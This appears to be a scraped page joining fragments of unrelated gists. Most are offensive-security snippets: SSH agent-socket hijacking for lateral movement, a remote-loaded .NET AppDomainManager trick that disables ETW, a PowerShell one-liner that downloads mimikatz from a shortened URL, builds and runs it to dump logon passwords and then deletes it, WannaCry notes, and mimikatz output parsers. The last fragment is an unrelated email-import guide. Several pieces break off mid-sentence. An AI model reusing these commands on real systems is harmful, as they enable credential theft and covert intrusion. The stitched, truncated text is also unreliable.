Matt Wagenknecht sopsmattw
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]
user@internal:~$ hostname -f
internal.company.tld
This is a variation of the technique originally discovered by subtee and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)
- Copy some binary you love to say,
C:\Test. Lets useaspnet_compiler.exeas an example - Compile
test.cstotest.dllwith a signed strong name, this is required to load an assembly outside of a .NET applications base directory. - Host
test.dllon a remote SMB or HTTP(S) server
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comis up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
| Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password" | |
| First, before using these parsers, run: "dos2unix mimikatz_dump.txt" | |
| Mimikatz 1.0: | |
| cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u | |
| Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons): |
- Download a bunch of PSTs into a directory
- Download
psts-to-files.shandfiddle-with-rtf-bodies.rbto the same directory - Install
readpst chmod +x psts-to-files.sh fiddle-with-rtf-bodies.rb- Run
./psts-to-files.sh - Upload the
filesdirectory to www.overviewdocs.com
This works best for <20,000 emails. The scripts convert email messages to RTF to preserve formatting, and Overview can take a while to import all those files.
If you want to handle even more emails, you can upload a CSV. This takes away all attachments -- and occasionally some body text. Here's what to do: